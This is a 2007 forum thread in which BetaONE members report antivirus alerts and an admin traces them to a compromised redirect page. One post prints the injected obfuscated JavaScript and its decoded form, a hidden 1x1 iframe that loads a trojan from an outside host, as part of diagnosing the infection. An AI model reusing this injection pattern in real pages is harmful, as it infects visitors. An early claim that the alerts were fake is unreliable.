BetaONE will rise again!

BetaONE will rise again! (http:\\b1.hcanet.com\forum/index.php)
-   Chit Chat (http:\\b1.hcanet.com\forum/forumdisplay.php?f=25)
-   -   B1 Infected ! (http:\\b1.hcanet.com\forum/showthread.php?t=30228)

Alpine 1st Nov 07 02:32 PM

B1 Infected !
 
Each time i log on B1 , i got a msg from kapersky!

take a look!

User Needs 1st Nov 07 03:39 PM

What version of Kaspersky are you using?
I use Kaspersky 7 and have never had that happen!

Can you scan with
http://housecall.trendmicro.com/?WT.TM_clusty_flg=7
and post the results?

Oldbunny 1st Nov 07 05:01 PM

Quote:

Originally Posted by Alpine (Post 96947)
Each time i log on B1 , i got a msg from kapersky!
take a look!

Well.. a one word about what Kaperski don't like and always will pop-up as the msg above..
The board is setup with accept the "Privacy Report" icon which appear at the bottom of Board Screen anywhere you go..
It just support the "PayPal" listing here which cause the Firewal, Antivirus and own Internet Explorer to put and stay in the Allert mode.. which wake-up the Kasperski attention..
This warning are Fake and Kasperski know about but they never change that!

=========================
"Privacy Report":
RESTRICTED WEBSITE
https://www.paypal.com/en_US/i/btn/x-clickbut21.. - Blocked

=========================
This is part of IE Security Setup.. and you able to change so Open that Report and make own change.. and in respond the Kasperski will Love that and Stop such Fake Warnings!

Alpine 1st Nov 07 05:59 PM

strange, bcause at the job i have versoin 7.0.0.125 and it does that !

At home, i have a version 6 i think ! But i didn't come on b1 since fews week from home !
Im gonna test that tonight !!

Cyberion 2nd Nov 07 02:18 AM

I did go to betaone.net/ and was forwarded to a link site with a bunch of adult pictures, but I figured that I missspelled it.. kinda weird. and yes AVG complained to me as well about there being a bug, but only at that forwarded site.

User Needs 2nd Nov 07 02:21 AM

I made a complete scan with Kaspersky 7.0.0.125 and nothing!

Alpine 2nd Nov 07 12:24 PM

Quote:

Originally Posted by Cyberion (Post 96998)
I did go to betaone.net/ and was forwarded to a link site with a bunch of adult pictures, but I figured that I missspelled it.. kinda weird. and yes AVG complained to me as well about there being a bug, but only at that forwarded site.


I've got this prob at home too !!
This is not beause a missspelled ! I got it in bookmark since few years and i never got this b4 !

KingCobra 2nd Nov 07 06:21 PM

What browser is everyone using when they seen the problem?

One might have a hole vs. another.

User Needs 2nd Nov 07 06:29 PM

I'm using IE7

Alpine 2nd Nov 07 09:10 PM

I am using Ie7 and Ie6!

DoG 3rd Nov 07 10:38 PM

I'm seeing this problem now on Firefox- will scan the server and see what's happening.

Voodoo 6th Nov 07 01:49 PM

I am now also getting this from Nod32. I also notice a few other websites loading when I go to BetaOne. :o



Cheerz
Voodoo

Voodoo 8th Nov 07 05:44 PM

BUMP :o

Can an admin look at this. As stated, a shitload of other sites are also loaded when you come here. Cant be good.:confused:

Cheerz
Dave

DoG 8th Nov 07 10:29 PM

The server was scanned and cleaned earlier this week- afaik it's still clean but will check. Are you sure you havent been infected with spyware?

freezer121 9th Nov 07 07:54 AM

I've just got precisely the same as Voodoo from my NOD32. I think I'm clean but I'll check. I had no indications of a problem before today and was following the thread out of interest only - then Bingo! :)

Alpine 9th Nov 07 01:08 PM

i am clean on the 2 pcs i use to come over b1 ! Both are still giving me this virus !!

ill do another check on my pc right now !

DoG 9th Nov 07 10:16 PM

I scanned the server last night with KAV and Trend House Call but all was clean......

Cactus 11th Nov 07 08:47 PM

DoG,

Now don't tell me you really coudn't find this....

The first page when surfing to B1 is named "BetaONE Hotfix" and has the following HTML code:

Code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
  <title>BetaONE Hotfix</title>
</head>

<body><Script Language="Javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>
  <meta http-equiv="refresh" content="0; url=http://www.betaone.net/forum" />
</body>

</html>

The Javascript code (unescaped) is
Code:

<iframe src="http://mn96.dns.gendistr.info/qualitytest" width=1 height=1></iframe>'
That page (after some more site switching) eventualy leaves you infected with what Symantec call's Trojan.Exploit.131 (see http://securityresponse.symantec.com...033008-3019-99) after witch it loads the betaone.net/forum page as if all is well.

So sure, the server might not be infected, but the index.php contains code that will get you infected. Now don't tell me you didn't see this, i mean, come on ;)

Oh, and I saw today is yout birthday. Congratulations! Have a beer on me!

Anyways,
Cheers,

Le Cactus

DoG 12th Nov 07 06:14 PM

I removed the erroneus script when i realised that it never used to be part of the hotfix page- then i saw your post and felt much happier :)
Hows's it going Cactus? Thanks for the Birthday wishes :)

Voodoo 12th Nov 07 07:38 PM

Quote:

Originally Posted by DoG (Post 97471)
I removed the erroneus script when i realised that it never used to be part of the hotfix page-

Hi there Mike. All the other sites are still loading on my side? :eek: Tried Firefox as well as Opera.

Cheerz
Dave

DoG 13th Nov 07 03:54 AM

Try B1 again after clearing cookies. i cleaned redirect screen.

freezer121 13th Nov 07 09:06 AM

I cleared my Firefox betaone cookie, restarted and brought up the site; NOD lit up again, this time with a different trojan name. I made a nonsense of capturing the screen so can't be more explicit - sorry.

Most worrying, I saw a reference to Paypal (bottom left of the screen) before I got to B1. Don't know if it was loading the Donate button or up to no good!

NOD terminated whatever was going on and asked me to submit the trojan, which I did.

Having spent most of yesterday morning scanning with Defender, Counterspy and NOD, I am confident NOD is keeping me clean - but it's quite an exciting ride to B1 these days. :lol:

Voodoo 13th Nov 07 01:37 PM

Got this again today:




It now seems to be loading even more sites than previously. :mad: If you compare this screenshot to the previous one, you will notice that the site is different. O, and I did clear my cookies. Get the same in IE7 and in Firefox.

:confused:

Cheerz
Dave

DoG 13th Nov 07 03:54 PM

It seems that there could be be multiple instances of the exploit installed on different pages on the server. Might have to go through them one by one as virus scanners don't seem to be able to detect them on the server :(

Voodoo 14th Nov 07 07:53 PM

Mike, did you fix this? :D Much appreciated. :clapping:

Cheerz
Dave

freezer121 17th Nov 07 08:38 AM

It all seems fine now, thanks for fixing it. :)

KingCobra 17th Nov 07 06:18 PM

I have been surfing betaone with my wii to be safe. IS the problem really fixed now. Where did it come from.

DoG 18th Nov 07 12:53 AM

It seems to have come from another web admin on the server installing a program with a security flaw or other vulnerability. Please be assured that the server is constantly being updated and regular AntiVirus scans do take place, it's just hard for any single AV program to catch all the numerous windows exploits in circulation. The recent spate of problems stems from a a trojan that inserted a java script 'exploit' into one of the redirect pages for the B1 website. Unfortunately, once the system was cleaned of the trojan the javascript remained. The affected file was cleaned by hand and write protected to prevent any further problems. There was around a 24 hours delay before the users saw any benefit from the 'disinfection(?)' whilst local cache's were cleared etc.
All should b e fine now and i apologize for any inconvenience caused.

EDIT: @ Cactus: The index.php is fine, it's the portal redirect that isn't updated when we update the VBulletin software that was infected ;) A few permission changes on the server and a quick lookie see later and it's all sorted :) BTW, Where the hell have you been??? Its been too long- PM me and come in from the wilderness ;) We miss ya bud!

Voodoo 18th Nov 07 06:28 PM

:mad:Shit, it is back again and now loads more sites than before? How can this be?

DoG, help. :eek:

Cheerz
Dave

DoG 19th Nov 07 12:32 AM

Fixed- again :angry:

Not sure what is going on but it seems that the file attributes were changed to allow the file to be written to again. I changed the security settins so it should be good now.
Clear all cookies and internet cache and try again please.

Voodoo 19th Nov 07 02:27 PM

Thanks DoG, much appreciated. ;)

Cheerz
Dave

Voodoo 20th Nov 07 03:05 PM

DoG, guess who's back, back in town? :lol: Yip, them nasties are back.

Cheerz
Voodoo

DoG 21st Nov 07 02:13 AM

FFS, the server must still be infected somewhere. Will see what's been changed this time.

DoG 21st Nov 07 02:32 AM

Ok, the file that was being changed last time doesnt have the java script in it. Searching all the other files in our section of the hdd but all is clear so far.


All times are GMT +1. The time now is 08:49 AM.

Powered by vBulletin® Version 3.6.5
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.